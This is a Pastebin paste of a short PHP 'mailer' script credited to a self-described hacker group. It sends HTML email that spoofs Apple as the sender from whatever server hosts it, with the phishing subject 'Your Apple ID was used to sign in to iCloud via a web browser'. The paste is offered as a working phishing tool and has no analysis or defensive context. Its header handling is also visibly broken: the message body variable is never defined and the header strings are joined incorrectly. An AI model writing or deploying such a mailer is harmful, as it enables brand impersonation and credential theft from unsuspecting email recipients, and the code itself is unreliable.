cdfteller

Sup Mailer

May 27th, 2020
271
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.58 KB | None | 0 0
  1. <body bgcolor="black">
  2. <?php
  3. /* made by Raymond7 */
  4. /* Garuda Security Hacker ! */
  5. /* mail.php */
  6. $name = "Apple"; $to = "[email protected]"; $web="$_SERVER[HTTP_HOST]"; $subject = "Your Apple ID was used to sign in to iCloud via a web browser"; $email = "Apple@$web"; $headers = 'From: ' . $email . "\r\n". $headers = "Content-type: text/html\r\n"; 'Reply-To: ' . $email. "\r\n" . 'X-Mailer: PHP/' . phpversion(); if (mail($to, $subject, $body, $headers,$name)) { echo("<font color=lime>Email sended to => $to </font>"); } else { echo("<font color=red>Not support for mailer</font>"); } ?>
Advertisement
Add Comment
Please, Sign In to add comment